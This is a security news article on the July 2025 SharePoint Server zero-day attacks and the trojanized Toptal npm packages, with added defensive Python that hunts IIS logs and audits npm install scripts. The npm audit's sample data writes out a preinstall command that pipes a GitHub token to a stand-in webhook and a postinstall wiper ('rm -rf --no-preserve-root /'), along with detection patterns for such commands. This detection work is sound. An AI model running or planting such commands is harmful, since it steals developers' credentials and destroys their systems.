Ongoing Exploitation of Microsoft SharePoint Zero-Day Vulnerabilities
In July 2025 the cybersecurity community has been responding to rapidly escalating attacks that chain multiple zero-day vulnerabilities in on-premises Microsoft SharePoint Server. Exploited broadly since early July, the flaws have hit government, healthcare, financial, and corporate organizations worldwide. Attackers use them for unauthenticated remote code execution, quietly taking over SharePoint servers and, in some incidents, going on to deploy ransomware. SharePoint Online in Microsoft 365 is not affected; only self-hosted SharePoint Server installations are exposed.
Technical Analysis of the Exploits
The vulnerabilities under attack are high-severity CVEs with CVSS scores up to 9.8 that grant unauthenticated remote code execution and privilege escalation on on-premises Microsoft SharePoint Server. Exploitation begins with a crafted HTTP request to a vulnerable SharePoint endpoint that lets the attacker run code without authenticating. Because the SharePoint worker process runs with high privilege and the server is integrated with Outlook, Teams, and OneDrive, a compromised server gives the attacker administrative control and a path to manipulate, exfiltrate, or destroy data in connected Microsoft 365 services. A further consequence is that the attacker can read the server's ASP.NET machine keys; with those keys they can keep forging validly signed requests even after the vulnerable code is patched, which is why Microsoft's guidance pairs patching with key rotation.
Security researchers confirmed active exploitation from at least July 7, 2025. Initial targets included a major Western government, followed by telecommunications and software companies in North America and Europe. Observed techniques include custom post-exploitation tooling and persistence mechanisms that bypass SharePoint's built-in protections and evade standard endpoint detection. Notably, at least one IP address linked to this campaign was previously associated with exploitation of Ivanti EPMM vulnerabilities, indicating that the threat actor reuses infrastructure across zero-day campaigns.
Attribution and Actor Tactics
Microsoft identified Storm-2603, which it assesses with medium confidence to be a China-based threat actor, as one of the groups exploiting CVE-2025-53770, alongside the China-based espionage groups Linen Typhoon and Violet Typhoon. Storm-2603 uses the SharePoint exploit to deploy backdoors and establish command-and-control channels, then moves laterally and maintains persistent access. The campaign targets organizations with sensitive geopolitical ties, and its sophistication points to significant preparatory reconnaissance and tailored payload delivery.
Attack patterns from Storm-2603 and other actors combine large-scale automated scanning for vulnerable instances with targeted manual exploitation of high-value victims. Deployment of Warlock ransomware through compromised SharePoint servers has also been documented, marking a shift from espionage to profit-driven attacks in some incidents.
Cybersecurity agencies including the U.S. Cybersecurity and Infrastructure Security Agency (CISA) classify these vulnerabilities as urgent, and CISA has added them to its Known Exploited Vulnerabilities catalog with a patching deadline for federal agencies. Microsoft has issued emergency mitigation guidance and out-of-band security updates, but unpatched, internet-facing servers continue to be exploited.
Operational Impact and Defensive Recommendations
Organizations running on-premises SharePoint Server must apply all available security updates immediately and follow Microsoft's updated mitigation guidance. Patching alone does not evict an attacker who has already stolen the server's machine keys, so Microsoft's guidance also calls for rotating the SharePoint Server ASP.NET machine keys and restarting IIS after the update is applied, and for enabling AMSI integration with Microsoft Defender Antivirus on the server. Security teams should monitor for unauthorized SharePoint access, track indicators of compromise published by Microsoft and threat intelligence vendors, and tune endpoint detection and response to SharePoint-specific behaviour: the IIS worker process (w3wp.exe) spawning cmd.exe or PowerShell, and unexpected .aspx files appearing in the SharePoint LAYOUTS directory.
The scope and persistence of these attacks highlight the need for continuous vulnerability management, a complete asset inventory that includes every internet-facing SharePoint instance, robust network segmentation, and regular threat hunting on enterprise collaboration platforms. Incident response playbooks should also be updated for the stealthy lateral movement and data exfiltration tactics observed in these breaches, including the assumption that stolen machine keys allow re-entry after patching.
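As an added example (not code from the original article, Microsoft, CISA, or any vendor), the following Python hunts IIS W3C logs for the request pattern that Microsoft and CISA published for this campaign, turning the "crafted HTTP request" of the technical analysis and the "monitoring for unauthorized SharePoint access" recommendation above into something a responder can run: a POST to /_layouts/15/ToolPane.aspx whose Referer is /_layouts/SignOut.aspx, followed by a request from the same client to another .aspx page under /_layouts/15/, which is how the dropped web shell was retrieved. The log lines are constructed for the example; the field order is taken from the #Fields header, as in real IIS logs, and because IIS substitutes + for spaces inside fields, whitespace splitting is safe.

```python
"""Hunt IIS W3C logs for the published SharePoint exploitation pattern.

Indicators (from Microsoft's and CISA's public guidance on the July 2025 attacks):
  1. POST to /_layouts/15/ToolPane.aspx with a Referer of /_layouts/SignOut.aspx
  2. a follow-on request from the same client to another .aspx under /_layouts/15/
     (the dropped web shell, e.g. spinstall0.aspx)
Legitimate web-part editing also POSTs to ToolPane.aspx, so rule 1 keys on the
SignOut Referer, and rule 2 fires only for clients that already tripped rule 1.
"""
import re
from collections import defaultdict

# Constructed sample in IIS W3C format (not a real capture). The first request is
# routine, the second and third are the exploit pattern, the fourth is a legitimate
# administrator editing a web part and must not be flagged.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-18 14:02:11 10.0.0.5 GET /sites/hr/default.aspx - 443 CONTOSO\\jdoe 10.0.0.77 Mozilla/5.0 - 200
2025-07-18 14:05:40 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.9 Mozilla/5.0 https://sp.contoso.local/_layouts/SignOut.aspx 200
2025-07-18 14:05:43 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.9 Mozilla/5.0 - 200
2025-07-18 14:09:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\\admin 10.0.0.12 Mozilla/5.0 https://sp.contoso.local/_layouts/15/settings.aspx 200
"""

TOOLPANE = "/_layouts/15/toolpane.aspx"
SIGNOUT_REFERER = re.compile(r"/_layouts/(15/)?signout\.aspx", re.IGNORECASE)
LAYOUTS_ASPX = re.compile(r"^/_layouts/15/[^/]+\.aspx$", re.IGNORECASE)


def parse_iis_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]  # IIS may emit a new #Fields line mid-file
            continue
        if raw.startswith("#") or not raw.strip():
            continue
        values = raw.split()  # IIS encodes spaces inside fields as '+'
        if fields is None or len(values) != len(fields):
            continue  # skip malformed lines rather than mis-assign columns
        yield dict(zip(fields, values))


def hunt(text):
    """Return (rule, client_ip, detail) tuples in log order."""
    findings = []
    suspects = defaultdict(list)  # client IP -> matching ToolPane requests
    for e in parse_iis_w3c(text):
        stem = e["cs-uri-stem"].lower()
        client = e["c-ip"]
        if (e["cs-method"] == "POST" and stem == TOOLPANE
                and SIGNOUT_REFERER.search(e.get("cs(Referer)", "-"))):
            suspects[client].append(e)
            findings.append(("toolpane_signout_post", client, f"{e['date']} {e['time']}"))
        elif client in suspects and stem != TOOLPANE and LAYOUTS_ASPX.match(stem):
            findings.append(("followup_layouts_aspx", client, e["cs-uri-stem"]))
    return findings


if __name__ == "__main__":
    for rule, ip, detail in hunt(SAMPLE_IIS_LOG):
        print(f"{rule:24} {ip:16} {detail}")
```

Run it against real logs with hunt(open(path, encoding="utf-8", errors="replace").read()), one file per IIS site. An empty result is not a clean bill of health: a client can omit the Referer, and later exploit variants used other request parameters, so pair this with a filesystem check for unexpected .aspx files in the SharePoint LAYOUTS directory and with process-creation telemetry for w3wp.exe spawning cmd.exe or powershell.exe.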
Supply Chain Breach: Compromise of Toptal’s GitHub and npm Packages
A major software supply chain breach has been reported after unknown threat actors compromised Toptal's GitHub organization. The attackers used that access to publish trojanized versions of Toptal's own npm packages, the Picasso design system libraries, under the legitimate @toptal scope. The malicious versions were engineered to steal developers' GitHub authentication tokens and then attempt to wipe the host, and were downloaded thousands of times before they were removed.
Supply Chain Attack Mechanisms
The incursion began with unauthorized access to Toptal's GitHub organization, which also gave the attackers the ability to push to the package repositories and publish to npm. This was not typosquatting (registering look-alike names) or dependency confusion (shadowing a private name on the public registry): the attackers published new versions of the genuine packages under the legitimate @toptal scope, so name-based defenses offered no protection, and any build that resolved the latest in-range version pulled the trojanized release. The payload rode in npm lifecycle scripts, which the npm client runs automatically during installation unless scripts are disabled.
Analysis of the published versions found a preinstall script that read the developer's GitHub CLI authentication token (gh auth token) and posted it to an attacker-controlled webhook, followed by a postinstall script that attempted to delete the entire filesystem (rm -rf with --no-preserve-root on Linux and macOS, with an equivalent deletion command for Windows). The pairing is unusual: a credential harvester combined with a destructive wiper rather than a stealthy, long-lived backdoor, which limited the attackers' persistence but maximised immediate damage.
Incident Response and Remediation
On discovery, Toptal reverted the malicious commits, unpublished the affected versions from npm, and began an internal investigation, working with the npm registry and the security community to notify affected developers. Any developer or CI system that installed the affected @toptal package versions during the exposure window should assume compromise: revoke and reissue GitHub tokens (the gh CLI token in particular), inspect GitHub audit logs for use of the stolen token, and rebuild any machine on which the postinstall script ran from a known-good image.
The incident underscores the need for defense-in-depth in CI/CD pipelines: lockfiles pinned to exact versions with integrity hashes, installing with lifecycle scripts disabled (ignore-scripts) wherever native builds do not require them, review of third-party packages before they enter a build, and automated dependency validation before deployment. It also highlights the value of software artifact provenance, such as npm provenance attestations that tie a published version to a specific source repository and build workflow, and of hardening the accounts that are allowed to publish packages.
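As an added example (not code from the original article, Toptal, npm, or any vendor), the following Python audits an installed npm tree for install-time lifecycle scripts and for known-bad versions, the two checks a build pipeline needs to catch a trojanized release of a package it already trusts, as described in the attack-mechanism and remediation sections above. The package names, versions, and scripts in INSTALLED and KNOWN_BAD are constructed for the example; @acme/design-system is a hypothetical package whose scripts are modelled on the behaviour reported for the Toptal packages, and the regular expressions are a starting list, not a complete detector.

```python
"""Audit npm packages for install-time lifecycle scripts and known-bad versions.

npm runs preinstall/install/postinstall/prepare automatically during `npm install`
unless scripts are disabled, so each of them is an arbitrary-command hook for the
package author, or for whoever has taken over the author's publishing rights.
"""
import json
import pathlib
import re

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Shell fragments typical of credential theft or destructive payloads. A hit is a
# reason to block the build and read the script, not proof of malice.
SUSPICIOUS = [
    (re.compile(r"\bgh\s+auth\s+token\b"), "reads GitHub CLI token"),
    (re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.I), "network call in install hook"),
    (re.compile(r"\brm\s+-rf\b|--no-preserve-root|\bdel\s+/f\b", re.I), "destructive delete"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b|\beval\b|\$\([^)]*\)", re.I), "obfuscated or eval'd command"),
]

# Constructed sample tree (name -> package.json subset). @acme/design-system is a
# hypothetical package whose scripts mirror the reported Toptal payload.
INSTALLED = {
    "left-pad-ish": {"version": "1.3.0", "scripts": {"test": "node test.js"}},
    "native-thing": {"version": "2.0.1", "scripts": {"install": "node-gyp rebuild"}},
    "@acme/design-system": {
        "version": "9.0.6",
        "scripts": {
            "preinstall": "gh auth token | curl -s -X POST https://example.invalid/hook -d @-",
            "postinstall": "rm -rf --no-preserve-root /",
        },
    },
}

# Constructed known-bad table, the shape an advisory feed or internal blocklist provides.
KNOWN_BAD = {"@acme/design-system": {"9.0.6", "9.0.7"}}


def audit_package(name, manifest, known_bad=KNOWN_BAD):
    """Return human-readable findings for one package; an empty list means nothing to review."""
    findings = []
    version = manifest.get("version", "?")
    if version in known_bad.get(name, set()):
        findings.append(f"{name}@{version}: version is on the known-bad list")
    scripts = manifest.get("scripts") or {}
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        reasons = [why for pattern, why in SUSPICIOUS if pattern.search(cmd)]
        if reasons:
            findings.append(f"{name}@{version}: {hook} script {', '.join(reasons)}: {cmd!r}")
        else:
            findings.append(f"{name}@{version}: has {hook} script (review): {cmd!r}")
    return findings


def audit_tree(installed, known_bad=KNOWN_BAD):
    """Audit every package; returns {name: [findings]} for packages with findings."""
    report = {}
    for name, manifest in installed.items():
        findings = audit_package(name, manifest, known_bad)
        if findings:
            report[name] = findings
    return report


def load_node_modules(root):
    """Build the `installed` mapping from a real node_modules tree (scoped packages included)."""
    installed = {}
    root = pathlib.Path(root)
    for pattern in ("node_modules/*/package.json", "node_modules/@*/*/package.json"):
        for manifest_path in root.rglob(pattern):
            try:
                manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
            except (OSError, ValueError):
                continue
            if "name" in manifest:
                installed[manifest["name"]] = manifest
    return installed


if __name__ == "__main__":
    for name, findings in audit_tree(INSTALLED).items():
        for line in findings:
            print(line)
```

In a real pipeline, call audit_tree(load_node_modules(".")) after npm ci --ignore-scripts and fail the build on any finding that is not on a reviewed allowlist; the native-thing case shows why an allowlist is needed, since node-gyp builds legitimately need an install hook. Installing with scripts disabled and then running only the reviewed build scripts removes the install-time execution path the Toptal packages abused, and a lockfile pinned to exact versions with integrity hashes means a newly published trojanized version is not picked up silently in the first place.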